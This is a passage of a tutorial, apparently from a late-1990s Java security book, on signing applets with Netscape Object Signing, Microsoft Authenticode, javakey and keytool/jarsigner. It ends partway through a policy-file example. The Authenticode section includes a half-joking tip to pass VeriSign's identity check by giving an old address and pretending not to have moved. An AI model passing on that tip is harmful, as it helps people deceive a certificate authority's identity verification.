The special privileges an applet can request are called capabilities by Netscape.1 Predictably, no two browsers support flexible privileges in quite the same way, so privilege-management code will only work with one browser. (So much for "write once, run anywhere"!) As a result, while Netscape keeps its own internal version of these classes, in order to actually compile and test an applet that can request them, you must download the library from developer.netscape.com/docs/manuals/signedobj/capsapi_classes.zip. Put the zip file in your CLASSPATH (or otherwise edit the CLASSPATH). Now you will be able to develop code that requests extra privileges in Netscape. Note that you should not include these classes with your applet; the Netscape browser running on the remote machine will use its internal version of the classes.

The Capabilities library provides a class called the Privilege Manager that handles requests from the program to turn on and off privileges. When the first request to enable a certain privilege is made, the Privilege Manager prompts the browser's user, showing the certificate used to sign the code requesting the privilege, and asking whether the privilege should be granted. See Figure C.1. If the user agrees to grant the privilege, the privilege is granted for the lifetime of the applet. However, once the applet has obtained a privilege, it can turn the privilege off and on at its discretion.
Figure C.1 Netscape Navigator's Privilege Manager alerts a browser user with this window. The dialog box explains which dangerous privileges have been requested and who is vouching for the applet (through a digital signature). Clicking the "Remember this decision" checkbox is probably a bad idea.
To request a particular privilege to be enabled, you use the static method enablePrivilege() of class netscape.security.PrivilegeManager. The method takes a single String argument, which is the name of the privilege to enable. Some useful privileges include:

UniversalFileAccess: This privilege gives the applet the ability to access any file available to the user. It will enable the applet to call most things in the java.io package related to file manipulation. This privilege is a superset of other file manipulation privileges that may be requested individually, such as UniversalFileRead, UniversalFileWrite, and UniversalFileDelete.

UniversalSendMail: This privilege allows the applet to send email on behalf of the user.

UniversalExitAccess: Allows the Java applet to shut down the Netscape browser.

UniversalExecAccess: Enables the applet to run programs already stored on the user's local computer.

PrivateRegistryAccess: Grants access to application-specific portions of the computer's registry (Win32 only).

There are many more privileges that an applet can request. For a full list, see the documentation for the Capabilities API at developer.netscape.com/docs/manuals/signedobj/capabilities/01cap.htm.

A call to enablePrivilege will throw an exception that the applet must catch if the user decides not to grant the privilege specified in the call. Thus, the applet must be prepared to catch instances of netscape.security.ForbiddenTargetException. Here's a sample applet called FirstTry.java that uses enablePrivilege:

import java.applet.*;
import java.awt.*;
import netscape.security.PrivilegeManager;
import netscape.security.ForbiddenTargetException;

public class FirstTry extends Applet {
    private TextArea ta = new TextArea(10,100);

    public void init() {
        this.add(ta);
        this.show();
        try {
            PrivilegeManager.enablePrivilege("UniversalFileRead");
            ta.appendText("Read enabled!\n");
        } catch (ForbiddenTargetException fte) {
            ta.appendText("Read not enabled.\n");
            ta.appendText(fte.toString());
        } catch (Exception e) {
            ta.appendText("Unexpected exception!\n");
        }
    }

    public void paint(Graphics g) {
    }
}
The FirstTry applet doesn't do anything with the privilege it asks for, even if it is granted. However, it would be able to read any file, including the system password file on a Unix system, if it tried. That could be considered an abuse of privilege. Another potentially bad thing this applet could do would be to put the enablePrivilege call inside the paint method. Doing this will cause the browser to continually prompt the user for permission every time paint is called, which will happen until permission is granted, or until the browser is killed. Actually, the Netscape Grant/Deny window has a checkbox that says "Remember this decision." Checking the deny box will make this pop-up never appear again. The take-home message is that signed applets can be hostile too.

When you enable a privilege, it does not have to stay enabled for the entire execution of the applet. There are a few ways to turn privileges off (which is always a good idea). First, when the method that calls enablePrivilege returns, the privilege will automatically be disabled. As a result, you should not use a helper method to enable a privilege, because once execution returns from that method, the privilege will no longer be enabled. Second, you can call revertPrivilege, which also takes the name of a privilege as an argument. Finally, you can call disablePrivilege, which turns off a particular privilege. In no case will the granting of the privilege be revoked; the applet can turn the privilege back on by simply calling enablePrivilege again. To see an example of a signed applet, surf to www.securingjava.com/dpig/netscape.html.
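To make the enable-then-revert discipline concrete, here is a minimal sketch of our own (it is not part of the FirstTry example; the class name ReadHelper, the method name readFirstByte, and the file path are hypothetical). It does its privileged work and turns the privilege off in the same method, using the revertPrivilege call described above:

import java.io.FileInputStream;
import netscape.security.PrivilegeManager;
import netscape.security.ForbiddenTargetException;

public class ReadHelper {
    // Hypothetical helper: enable file reading only for the duration of the work,
    // then revert the privilege even if something goes wrong along the way.
    static int readFirstByte(String path) {
        try {
            PrivilegeManager.enablePrivilege("UniversalFileRead");
            FileInputStream in = new FileInputStream(path);
            int first = in.read();   // do the minimum privileged work needed
            in.close();
            return first;
        } catch (ForbiddenTargetException fte) {
            return -1;               // the user refused to grant the privilege
        } catch (java.io.IOException ioe) {
            return -1;               // the read itself failed
        } finally {
            // Turn the privilege off as soon as we are done with it.
            PrivilegeManager.revertPrivilege("UniversalFileRead");
        }
    }
}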
How to Sign Java Code
Section 2 -- Signing Java Applets with Microsoft's Authenticode
Next in our tutorial, we'll take on Microsoft's code-signing system for Java. It's a bit peculiar since it does not interact with the JDK 1.1 or Java 2 security models in an intuitive fashion. As usual, step one is securing an identity.
Getting an Authenticode Certificate

There are several ways to get a certificate for Microsoft Authenticode. One of the things you can do is generate "test certificates," which allows you to try things out. We'll tell you how to do that in a bit, if you just want to play around. However, if you plan on distributing any code, you're going to want to get a real digital ID. This costs money. A number of vendors distribute certificates, one of them being VeriSign, which we'll use in our examples.

To obtain a VeriSign certificate for Authenticode, point Internet Explorer to digitalid.verisign.com/developer/ms_pick.htm. Select a flavor of ID. For personal use, select a Class 2 ID. For business use, select Class 3. You'll be given a form to fill out. Note that the personal Class 2 ID is $20, and you'll have to pay by charge card. Once you submit the form, VeriSign will try to verify you are who you say you are, mainly by running a credit check. Sometimes the credit check won't have up-to-date information, so if you get rejected and you can remember the address for the last place you lived (which is the most common problem), you might want to try it again using old information, pretending you never moved. (Not that we condone this strategy, mind you.)

Once your data are approved, VeriSign will send you an email with instructions on picking up the certificate. When downloading your certificate, two files will need to be saved: your private key file, and your certificate file. You should probably save these files to a floppy disk instead of your hard drive, so that someone can't just snag your certificate off your computer (although, without knowing the password you use to protect your private key, snagging the files alone may not do a bad guy much good). Remember the password used to protect the private key; it will be needed when it comes time to sign code. For the sake of simplicity, we'll assume you saved your certificate as a:\Cert.spc and your private key as a:\Key.pvk.
Getting the Signing Software

Before signing anything with the new certificates, download and install the Microsoft Java SDK. It's located at www.microsoft.com/msdownload/java/sdk/31f/SDK-JAVA.asp. We'll assume you installed the Java SDK in the directory C:\SDK-Java.31. All of the programs we're going to need for signing Java code live in C:\SDK-Java.31\Bin\PackSign, so you should probably add that directory to your PATH. Under Windows 95/98, running the following command at the DOS prompt will fix up your PATH for the current session:

PATH=%PATH%;C:\SDK-Java.31\Bin\PackSign

You can add that command to your autoexec.bat file to make the change persist through a reboot.
Cabinet Files

Unlike Netscape's Object Signing and Sun's signing tools (which work on JAR files), Authenticode signing will only work on cabinet (CAB) files. There's nothing special about the CAB format; it's just another way of archiving many files into one. However, it's the only archive format IE supports for signing Java code. Say we have an applet that consists of two files: file1.class and file2.class. We can create a CAB file in the same directory by typing the following at the DOS prompt:

cabarc N test.cab file1.class file2.class

If there are no other class files in the directory, we can also type:

cabarc N test.cab *.class
Security Zones

In order to understand what we're doing when we sign a CAB file, we need to know a little something about what an IE "security zone" is. By default, a security zone is a group of Web sites. Each zone is assigned a security level, which may be Low, Medium, High, or Custom. We won't cover Custom zones, except to say that they can implement arbitrary security policies. For more on security zones, see Chapter 1, "Mobile Code and Security: Why Java Security Is Important."

There's a default zone called Trusted Sites, into which a user can put any server. All code from that zone will be completely trusted (i.e., the zone has a Low security level). Similarly, there's a Restricted Sites zone. Any sites the user puts in this zone will need explicit permission before they can run anything "outside the sandbox." By default, most everything else falls into the Internet zone, which is assigned a Medium security level. Code can run outside the Java sandbox in a very limited manner. For example, code can use up to 1 megabyte of data on your hard drive by using the API com.ms.io.clientstorage, which is included with Microsoft VMs only. (So much for "write once, run anywhere"!) Unlike fully trusted applets, applets restricted to the Medium security level should not otherwise be able to use your file system.

We're going to sign our cabinet file, requesting to run either with Medium or High privileges (we can also request Low privileges, but since we'll always be allowed to run in the sandbox, doing so is mainly useful only to show you vouch for the CAB file). If our code ends up in a Low security zone, our code will always run without prompting the user for permission. If our code ends up in a Medium security zone, then before code that requests Medium level privileges can run, the user will be prompted as to whether to let the code run. If our code ends up in a High security zone, all code that wants to run outside the sandbox will need to be approved through a dialog with the user. See Figure C.2.
Figure C.2 The security warning dialog used by Microsoft Internet Explorer's Authenticode system. This dialog explains who has vouched for the code (by signing it) and what permissions are being requested. Clicking "Always trust content from <user>" is probably a bad idea.
Signing CAB Files

To sign test.cab, we're going to use the signcode command, which is included in the Java SDK. Here's a typical command line:

signcode -j JavaSign.dll -jp High -spc a:\Cert.spc -v a:\Key.pvk -n "My Applet" -i http://www.mywebpage.com/ test.cab

The flags here are a bit arcane. If you want your CAB file to request permissions, the -j flag should always be there, and take JavaSign.dll as a parameter, unless you're signing something other than Java code (the same command can be used to sign ActiveX controls and other mobile code, too). The -jp flag passes a parameter to the DLL. For Java signing, that's how we request High privileges. The -spc flag and -v flag are used to specify the location of your certificate and private key, respectively. The -n option needs to be present, and it specifies the name of the software, which is displayed to the user before the user decides whether to run your code. The -i option specifies where to go for more information about the product, which also gets displayed when the user is prompted to give your code permission to run.

You can also "timestamp" your signature, so that after your certificate expires, your applet will still work. However, doing so requires a timestamp server, which isn't covered here. For more information on Authenticode for Java, visit www.microsoft.com/java/security.

To confirm that everything has worked properly so far, run the command:

chkjava test.cab

A window should appear similar to the one an end user will see when IE asks if the application should be allowed to run.
Making Test Certificates

To avoid putting down some cash for a real certificate from a CA and still be able to play around with Authenticode, you can make a test certificate. The first step is to create the certificate with the command:

makecert -sk Key.pvk -n "CN=Your Name" Cert.cer

That command makes a certificate and a private key you can use in other applications, but it won't work for code signing. To get it to work with code signing, convert it to a Software Publisher Certificate (SPC) by typing:

cert2spc Cert.cer Cert.spc

When you're finished with that, you can use Key.pvk and Cert.spc for testing purposes in the same way as if they came from a CA.
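For example, to try a test certificate end to end (a hypothetical run; the applet name and URL below are placeholders), you could plug the generated files into the same signcode command shown earlier and then inspect the result with chkjava:

signcode -j JavaSign.dll -jp High -spc Cert.spc -v Key.pvk -n "Test Applet" -i http://www.example.com/ test.cab
chkjava test.cab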
Special HTML Tag

When deploying a signed CAB file in an HTML page, a slight variation on the <APPLET> tag is necessary. As with all applets, the name of the class that extends java.applet.Applet goes in the CODE attribute. However, instead of putting the name of the CAB file in the ARCHIVE attribute as is done with JAR files, CAB files signed with Authenticode are passed using the PARAM tag. As an illustration, the tag to embed into a web page the signed applet "MyApplet" stored in myapp.cab would look like:

<APPLET CODE="MyApplet.class">
<PARAM NAME="cabbase" VALUE="myapp.cab">
</APPLET>

The named parameter "cabbase" is how Internet Explorer finds the CAB file containing the class specified in the CODE attribute.
How to Sign Java Code
Section 3 -- Comparing Authenticode to Netscape Object Signing
Microsoft's Authenticode model is somewhat simpler than the Communicator model for the end user. Assuming the user doesn't know anything about zones, lots of stuff runs without asking the user for permission; generally, the user is prompted to approve code only when the code requests full access and doesn't already have permission. Less interaction generally means less hassle for the user. You can make more dialog boxes disappear if you check boxes like "always trust code from this person" and "always trust code from this site," which appear in the window that announces that code is trying to gain permissions. However, spreading trust around so easily just to avoid dialog boxes can have bad consequences.

Authenticode is also simpler for the developer. There's no need for calls to a Capabilities library, meaning you can simply request an access level, as opposed to requesting a set of privileges. However, Netscape is capable of finer-grained access control, which allows the applet to secure only the resources it needs to run without a user feeling the need to give a program complete access to the computer.

Another convenience of Authenticode over Object Signing is that the user only gets prompted at most once per applet. Netscape prompts the user whenever new privileges are requested (which is usually during execution). While the Netscape model is more intrusive, it does afford the user a bit more control over what privilege is granted to an applet.
How to Sign Java Code
Section 4 -- Signing Code with Sun's JDK 1.1.x
Sun makes its own set of signing tools. The tools have evolved along with the JDK. We'll briefly cover both the JDK 1.1 tools and the Java 2 tools.

The JDK ships with a command-line tool called javakey. Its job is to manage a database of entities (people, companies, etc.) and their public/private keys and certificates. It is also supposed to generate and verify signatures for archive files; however, verification is not implemented as of JDK 1.1.7. As Chapter 3 describes, an applet contained within a digitally signed JAR file is allowed to leave the bounds of the Java sandbox under certain circumstances. In JDK 1.1, if a JAR is signed and the user who has browsed to the Web site containing the applet has a policy stating that he or she trusts the person who signed the JAR, the applet can do anything at all that Java code is capable of. For example, it can read and write from the file system, start another process running on the computer (outside of the browser), open a network connection to an arbitrary machine, or perform myriad other tasks that applets are not normally allowed to do. In other words, trusted signed code under JDK 1.1 is as powerful as Java application code from the JDK 1.0.2 days. Remember, under JDK 1.1, we're operating under a black-and-white security model.

To get going with code signing in JDK 1.1, there are a few things to gather. On the development side, an applet that tries to perform actions that aren't normally allowed by the Java sandbox is needed (or at least one that can be augmented to attempt such an action). The most rudimentary operation that a signed applet can do that an unsigned applet can't do is read the user.name System property. An example applet follows:
public class UserApplet extends java.applet.Applet {
    public void init() {
        String username = "user: ";
        try {
            username += System.getProperty("user.name");
        } catch (SecurityException se) {
            username += "cannot read";
        }
        showStatus(username);
    }
}
A signed applet containing the preceding code (running in a browser of a user who trusts the entity that signed the applet) will be able to retrieve the name of the user running the applet and display it in the status bar of the browser.

Once the applet to be signed and its containing Web page have been created, the class files that contain the applet must be put into a JAR file. Even if the applet in question is only one class, it must be placed inside a JAR file. It is not possible to sign standalone class files. In order to sign Java code with javakey, a signing certificate needs to be created. Once this certificate is created, it can be used to sign the JAR file and distributed to users who wish to allow the signer's applet full access to their system.
Creating a Signing Certificate

A file called identitydb.obj stores all certificate information and lives in the directory specified by the Java System Property value user.home. For Unix Java users, this value evaluates to $HOME. For Win32 users, user.home can take a number of values. Different VMs assign the value of user.home either to the USERPROFILE directory, to the HOMEDRIVE\HOMEPATH directory, or when all else fails, to the value of the java.home System Property. To clear up any ambiguity, write and run a simple Java program containing the line:

System.out.println("user.home= " + System.getProperty("user.home"));

Regardless of user.home, the location of identitydb.obj can be set explicitly by adding an identity.database entry to the java.security file that lives in the lib subdirectory of the Java installation, wherever that may be on the system.
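One minimal way to wrap the System.out.println line above in a complete program (the class name ShowUserHome is our own choice, not a JDK class) is:

public class ShowUserHome {
    public static void main(String[] args) {
        // Print the directory where javakey expects to find identitydb.obj.
        System.out.println("user.home= " + System.getProperty("user.home"));
    }
}

Compile it with javac and run it with java on the same VM you plan to use for signing, since different VMs may report different values.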
First, the signer's identity must be created in the database. To create an identity, signername, that will be able to sign objects, run the following command on the command line:

javakey cs signername true

Now that a signer has been created, that signer's public and private keys must be initialized. Keys can be between 512- and 1024-bits long. To initialize public and private keys for a signer, run the following command (where # is a number between 512 and 1024):

javakey gk signername DSA #

Higher numbers mean more security. We recommend always using 1024-bit keys. The parameter DSA signifies the algorithm used to generate the keys. The JDK only comes with the DSA algorithm by default. To verify that all has gone well so far, run:

javakey ld

This command will list all the information in the current identity database. The entry for signername should identify it as a trusted signer as well as noting that the public and private keys have been initialized.

The next step generates a certificate that will be valid for signing JAR files. This is different from Netscape Object Signing in that there is no Certificate Authority involved. First, a directives file must be created. The directives file is a Java Properties file that provides values used during certificate generation. Here are the contents of an example directives file:

issuer.name=signername
subject.name=signername
subject.real.name=Sol S. Signer
subject.country=US
subject.org=Signing Corp
subject.org.unit=Development
start.date=22 Jul 1998
end.date=16 Aug 1999
serial.number=41
To generate the certificate once the directives file exists, run:

javakey gc directivesfile

To verify that the certificate was generated properly, run:

javakey ld

Look for the signername entry to have the subject.* information from the directives file listed. Everything is now finally set for signing.

The command actually used to sign a JAR file also requires a directives file. This is a different directives file than the one used to generate the signing certificate. The first directives file used to generate the certificate will no longer be needed, unless a different certificate needs to be generated. The second kind of directives file is used whenever a JAR gets signed, and should be kept handy. An example directives file for signing a JAR looks like this:

signer=signername
# look at javakey ld for certificate numbers, should be 1
cert=1
# chain unsupported, must have as value=0
chain=0
# must be 8 characters or less and not conflict with any other
# digital signatures that could be inserted into the JAR
signature.file=anything
out.file=Signed.jar
Once the signingdirective file has been created, run the command:

javakey gs signingdirective UnsignedApplet.jar

Running this command will generate Signed.jar, which will be a signed version of UnsignedApplet.jar. Putting Signed.jar in the ARCHIVE field of the APPLET tag in an HTML page will cause a Java-enabled browser to bring the JAR file over the network and execute the signed code contained within.

For more information on javakey, the official Sun documentation for Solaris can be found at java.sun.com/products/jdk/1.1/docs/tooldocs/solaris/javakey.html. The Win32 specific version can be found at java.sun.com/products/jdk/1.1/docs/tooldocs/win32/javakey.html.
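As a hypothetical illustration of embedding the signed JAR via the ARCHIVE attribute (using the UserApplet example from earlier; the WIDTH and HEIGHT values are arbitrary), the HTML might look like this:

<APPLET CODE="UserApplet.class" ARCHIVE="Signed.jar" WIDTH=400 HEIGHT=50>
</APPLET>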
Testing the Signed Applet

Now that a signed applet exists, and it is embedded within a Web page, it's ready for testing before release. Testing requires either appletviewer or a Web browser that knows how to validate JARs signed by javakey and allows signed JARs to leave the sandbox. Unfortunately, neither of the two major browsers (Netscape Communicator and Microsoft Internet Explorer) supports javakey-signed JARs. HotJava and the appletviewer program that comes with the JDK can validate JARs signed by javakey. They will allow signed applets out of the sandbox if the signature is valid and the policy states that the user whose signature appears is trusted. Both of these programs search for the identitydb.obj in the same manner that javakey does. The problem is that no one should be surfing the Net with HotJava (too dangerous), and the appletviewer cannot be used to browse the Internet. Since the VMs in Communicator and Internet Explorer do not support javakey signing, in order to run javakey-signed applets with those browsers, users must download and install Sun's Java Plug-In.
Java Plug-In for Communicator and Internet Explorer

Java Plug-In can be used to run applets instead of the browser's default VM. The Java Plug-In can be configured to use the most recent version of the Java Runtime Environment available from Sun. When an applet is run through the Java Plug-In instead of the browser's default VM, javakey-signed JARs can be verified and can step outside of the sandbox (if policy allows).

Users must download the Plug-In from Sun and install it on their system. The download page for the Plug-In is java.sun.com/products/plugin/index.html. Applet developers also need to modify the HTML pages that contain their applets and modify the <APPLET> tag. Applets that are in Web pages using the standard <APPLET> tag will still be run by the browser's default VM. The Plug-In will run applets only when it detects a different set of HTML tags that specify an applet. Sun provides an application called HTMLConverter, which can convert pages with the <APPLET> tag into pages containing tags that will launch applets using the Plug-In. The HTMLConverter homepage is java.sun.com/products/plugin/converter.html.

Two things to note about using the Plug-In: On Solaris, JavaScript must be enabled for the Plug-In to work properly. With JavaScript disabled, applets did not load or run when we tested the Plug-In with Communicator 4.02 and 4.06. On Win32, the Java Plug-In did not find the identitydb.obj file in the same place that javakey did. This has to do with different versions of the VM setting different values of the user.home Property. If you run into trouble, try moving the identitydb.obj file to a different location. Places to try are mentioned in the section, Creating a Signing Certificate (see page 298).
Distributing Public Keys and Certificates

In order for someone to verify who signed a signed JAR, he or she needs the public key of the entity who signed the JAR in the first place. Until the public key is distributed to people other than its owner, no one but the owner can verify that an applet is signed and by whom. Once the signed applet has been tested and has proven to be functional, it can be placed on a Web site for use by others. In order for the applet to escape the sandbox imposed by other people's browsers, users must have the public key or certificate of the entity that signed the applet. Also, the user must tell the identity database that he or she trusts the entity that signed the applet. Trusting the entity that signed the applet allows the applet complete access to the host. Here's how to create a trusted entry:

javakey c signername true

To import the signer's public key contained in keyfile, run:

javakey ik signername keyfile

To import the signer's certificate (which contains the signer's public key) from certfile, run:

javakey ic signername certfile

The identity must be created in the database before trying to import either the public key or certificate. In order to verify the signature on a signed JAR, you need only the public key of the signer. Certificates include the public key. The signer of the applet must make his or her public key (or certificate) available to users of the applet in some way. It could be linked from a Web site, phoned in, or delivered through email. Whichever way it is done, the identity must first be extracted from the identity database. To extract a public key from the database to a file keyfile, use the command:

javakey ek signername keyfile

To extract signername's certificate number 1 to a file certfile, use the command:

javakey ec signername 1 certfile

The information in the keyfile or certfile should be given to those who want to create a policy that allows applets signed with the identity to leave the sandbox.
How to Sign Java Code
Section 5 -- Differences Between Netscape Object Signing and JDK 1.1.x javakey
There are five major differences between Netscape's and Sun's approaches to code signing:

1. Netscape Object Signing only works within Communicator. JDK 1.1 signed applets can work in any browser, although Netscape Navigator and Microsoft Internet Explorer both require the installation of the Java Plug-In for the applet to leave the sandbox.

2. Netscape Object Signing requires getting a certificate from a certificate authority such as VeriSign. JDK 1.1 users can generate their own certificates.

3. Netscape Object Signing requires no modifications to HTML tags. If the Plug-In is needed for JDK 1.1 (in case you want to use IE or Netscape), the <APPLET> tag must be changed by HTMLConverter.

4. Netscape Object Signing uses Netscape's own classes to step outside of the sandbox. A Netscape-specific exception is thrown when permission to leave the sandbox is denied. JDK 1.1 javakey-signed applets do not need to include calls to any non-java.* classes to leave the sandbox, and java.lang.SecurityException is thrown when permission is denied.

5. Netscape Object Signing prompts the user when an applet attempts to leave the sandbox, asking the user for permission to carry out the dangerous act. Actions are grouped, so the user can allow some actions (file reads) but not others (file writes). JDK 1.1 javakey-signed applets that are trusted get complete access to the host.
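To illustrate the JDK side of the last two points, the following minimal sketch shows the kind of code an applet might use to probe for file access; the class name and file path are illustrative. Under JDK 1.1, an applet that has not been granted trust simply sees a java.lang.SecurityException when the security manager vetoes the read; a trusted javakey-signed applet sees no exception at all.

import java.io.FileReader;
import java.io.IOException;

public class ReadProbe {
    public static boolean canReadLocalFile() {
        try {
            FileReader in = new FileReader("C:\\autoexec.bat"); // illustrative path
            in.close();
            return true;              // trusted: the read was allowed
        } catch (SecurityException e) {
            return false;             // untrusted: the security manager said no
        } catch (IOException e) {
            return false;             // the file simply wasn't there
        }
    }
}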
How to Sign Java Code
Section 6 -- Signing Code with Sun's Java 2
The javakey tool from JDK 1.1 has been replaced by two tools in Java 2. One tool manages keys and certificates in a database. The other is responsible for signing and verifying JAR files. Both tools require access to a keystore that contains certificate and key information to operate. The keystore replaces the identitydb.obj from JDK 1.1. New to Java 2 is the notion of policy, which controls what resources applets are granted access to outside of the sandbox (see Chapter 3). The javakey replacement tools are both command-line driven, and neither requires the use of the awkward directive files required in JDK 1.1.x. Management of keystores, and the generation of keys and certificates, is carried out by keytool. jarsigner uses certificates to sign JAR files and to verify the signatures found on signed JAR files.
Getting Started with Keytool

The first step in working with Java 2 is getting the latest beta version from Sun. Members of the Java Developers Connection (JDC) can download Early Access releases of Java 2 software. Membership in the JDC is free with registration. Once registered, point your browser to developer.java.sun.com/developer/earlyAccess/jdk12/index.html. The Win32 version of JDK 1.2beta4 comes with the latest version of the Java Plug-In, which supports Java 2. During the install, answer yes when it asks whether the JRE and the Plug-In should be installed as well; the Plug-In will be needed later.

The keytool command operates on a keystore file. The name of the keystore file is .keystore by default, and it is located in the directory named by the user.home Java System Property. It is possible to have multiple keystores. Changing the keystore on which the current keytool command will operate is done through the -keystore <path to keystore> option.

Documentation from the Sun Java Web pages states that Java 2 VMs will run and properly authenticate JARs signed with JDK 1.1's javakey. It also states that the last beta release of JDK 1.2 does not yet support 1.1-signed JARs. The keytool utility also supposedly allows porting keys and certificates from 1.1 identitydb.obj files into a Java 2 keystore. According to the documentation, the command to perform the translation is:

keytool -identitydb -file <path to identitydb.obj file>

Unfortunately, an identitydb.obj file created with JDK 1.1.6 did not successfully import into the keystore when we tested the keytool from JDK 1.2beta4; we tried on both Win32 and Unix platforms. The error message returned from keytool mentions an InvalidClassError and states that a class used in key management became obsolete, resulting in a serialization error. Until this problem works itself out in later beta and production versions, the certificates and keys used under 1.1 cannot be used in Java 2. New certificates and keys will need to be generated for use with jarsigner and keytool.

Generating a public and private key pair and self-signed certificate can be performed from the command line in one shot without the need to create any directives files. All keys and certificates stored in the keystore are accessible through an alias. An alias is a name associated with a certificate entry that keytool uses to uniquely identify each certificate under its control. To generate a certificate keyed by the alias keyname, run the command:

keytool -alias keyname -genkey

keytool will begin prompting for information. The first prompt is for a keystore password, which will be needed for all further keytool and jarsigner operations on this keystore. It must be at least six characters long and is unfortunately echoed to the screen as it is typed. This means that the keystore password can be leaked to casual observers whenever keytool or jarsigner is used. Once the password has been entered, keytool prompts for some personal information, such as name, company name, city, state, and country. All this information is stored in the generated self-signed certificate, which is saved in the default keystore location. All the personal information is displayed for verification before keytool generates the keys and certificate.

After the certificate and keys are generated, keytool prompts for another password. Each certificate has its own password, separate from the keystore password. Entering nothing does not give the key an empty password. It gives the certificate the same password as the keystore. jarsigner will not prompt for the passwords of certificates that have the same password as the keystore, so it may appear that a certificate has no password. However, if the password of the keystore changes, the passwords of the certificates do not change, so jarsigner will start prompting for not only the password of the keystore, but for the certificate as well. The command to change the password of a keystore is:
keytool -storepasswd

keytool will prompt for the old password, and the new password twice, all in cleartext. This command does not affect the passwords of certificates in the keystore, including those that happen to have the same password as the keystore.

An apparent weakness of the keytool certificate generation system is that a user can accept all the default values for the personal information prompted for before certificate generation. The default value for all the questions is "Unknown." So keytool will generate a valid certificate that can be used to sign JAR files, but is filled with bogus information. No data validation is performed by keytool, so it is possible to, say, create a certificate for Elvis.

Certificates generated by the system will be valid for just under one year by default. To change the length of validity for a certificate to n days, add the flag -validity n to the keytool -genkey command. To view the fingerprints of certificates in the keystore, use the command:

keytool -list

To view the personal information about the issuer and owner of the certificate, run:

keytool -list -v
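As one combined example (the alias and file names here are illustrative), the following command generates a key pair and self-signed certificate under the alias devkey, makes the certificate valid for 30 days, and stores it in a keystore file named teststore rather than in the default .keystore:

keytool -genkey -alias devkey -validity 30 -keystore teststore

The prompts for the keystore password and the personal information are the same as described above; the only difference is which keystore file ends up holding the result.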
Signing a JAR

Once a private key has been generated, jarsigner can be used to mark a JAR file with the public key of the signer. The command to sign a JAR file called SignMe.jar with the keyname private key generated previously is:

jarsigner SignMe.jar keyname

jarsigner will prompt for the keystore password, and for the private key password if it is different from the keystore password, before signing the JAR file. To monitor the progress of the signing process, run:

jarsigner -verbose SignMe.jar keyname

jarsigner can also be used to verify that a JAR has or has not been signed, and by whom. For a simple signed/not signed answer for a JAR file Unknown.jar, run:

jarsigner -verify Unknown.jar
To get more information from the verification process, such as the signing status of each file in the JAR file, the personal information from the certificates used to sign each file in the JAR, and whether or not the certificate is known in the default keystore, run:

jarsigner -verify -verbose -certs Unknown.jar

After each signed file in the listing will be the personal information encoded in the certificate for the entity that signed the file. If that certificate is known in the keystore, the name it is known by will appear in parentheses after the certificate's personal information.
Enter the CA

So far, the only changes from JDK 1.1 are the syntax and the names of the commands. Certificates can be generated by keytool with any personal information at all. There is nothing to stop anyone from creating a certificate that claims that it is owned by someone else and signing a JAR with it. What a Certificate Authority can provide is a level of assurance that a certificate truly represents the individual that it claims to represent. That is, of course, if you trust that the Certificate Authority isn't being spoofed and is properly checking the certificates it vouches for. (Recall, this way madness lies.)

Certificates generated by keytool can be exported in a form suitable for submission to a Certificate Authority such as VeriSign. This can be accomplished by running:

keytool -certreq -alias keyname -file requestfile

That command puts a Certificate Signing Request into requestfile for the certificate known by the keyname alias. However, there is no information as to how to submit this data to a CA for validation. According to the keytool documentation, the CA will validate the certificate and return something that must be imported into the keystore. Although we haven't tested it, the command to import the response from the CA into the keystore is supposed to be:

keytool -import -alias newalias -trustcacerts -file response

That command imports the response from the CA, stored in a file called response, into the keystore under the name newalias, which must not already exist in the keystore. The -trustcacerts flag tells keytool to check the response certificate against the five VeriSign certificates that ship with Java 2 (at least there were five in JDK 1.2beta4).
Turning Over the Keys

Until the certificate used to sign the JAR is made public, no one can grant any permissions to the enclosed applet. To retrieve a copy of the keyname certificate from the keystore into a file mycert, use:

keytool -export -alias keyname -file mycert

As usual, keytool will prompt for the appropriate passwords. When the command finishes, the file mycert can be distributed to users who wish to grant additional privileges to applets signed by that certificate.

As in JDK 1.1, there is currently limited support for a JAR signed with the JDK tools. Again, Sun provides support through the Java Plug-In. Plug-In version 1.1.1 does not necessarily support Java 2. Although the Java Plug-In can be configured to use different VMs installed on the local system, the Plug-In hangs the browser when pointed to a Java 2 VM on Solaris. Documentation for the Win32 version of the Plug-In mentions running a program off the Start menu to configure the Plug-In. The installation script does not create a program group for a Plug-In Control Panel as advertised under Windows NT unless the user performing the installation has permission to create program groups. An Early Access version of the Plug-In for Java 2 on Solaris is available to members of the Java Developer's Connection. The latest version of the Plug-In for Win32 ships with JDK 1.2beta4.

As with JDK 1.1, any HTML pages that contain Java 2-signed JAR files must be converted using the same HTMLConverter used in JDK 1.1. Converting the HTML ensures that the applet will run in the Plug-In and not in the browser's default VM. See the section on JDK 1.1 JAR signing for information on where to get the HTMLConverter.
Running a Signed Applet

The first step upon encountering a signed applet is to locate the certificate of the entity that signed the JAR file and import it into the local keystore. Assuming that the certificate can be located and placed into a file called acert, run:

keytool -import -alias analias -file acert

An entry in the keystore is created keyed by the name analias for the certificate stored in acert. This is now a trusted entity. Whereas in JDK 1.1, aliases could either be trusted or untrusted, all aliases in Java 2 keystores are trusted. However, in JDK 1.1, trusted aliases could do anything they wanted; aliases in Java 2 cannot do anything unless granted permission. Permissions are granted to aliases through the use of policy files (see Chapter 3).
Creating a Simple Policy for Signed Applets

Java 2 introduces the notion of policy. Creating, understanding, and managing security policy for signed mobile code is a difficult and complex problem. Since this discussion is about signing code and not about constructing policy, an extremely simple example of how to construct policy is presented. Creating good policy is beyond the scope of this tutorial. The example policy is strong enough to allow an applet limited file access to the host machine.

Java policy files can be created with the new policytool. This application has a GUI to guide users through the many twists and turns encountered when creating policy files. It's a very simplistic GUI with no online help. In its current form as of beta4, it is only useful if one does not know the syntax of a policy file. Policy files are plaintext files that follow a format outlined at java.sun.com/products/jdk/1.2/docs/guide/security/PolicyFiles.html. The default security policy system first reads a system-level policy file from the lib/security/ subdirectory under the Java installation directory. It then tries to read a .java.policy file from the current user's user.home directory. In this file, users specify their personal security policy, which merges with the system security policy. Permissions that can be granted in a Java policy file are outlined at java.sun.com/products/jdk/1.2/docs/guide/security/permissions.html, as well as in Chapter 3.

If the policy file is to make reference to a certificate stored in a keystore, a keystore entry must appear in the policy file. The keystore entry specifies the path relative to the policy file itself and the name of the keystore file. To keep things simple and use the default keystore file, add the following line to the .java.policy file in the user.home directory:

keystore ".keystore";

To grant an applet permission to write or create any file in the c:\tmp directory, assuming the applet comes from www.friendly.com/~mybuddy/applets/ and is signed by a certificate known in the default keystore as friend, add to the .java.policy file:

keystore ".keystore";

grant signedBy "friend", codeBase "http://www.friendly.com/~mybuddy/applets/" {
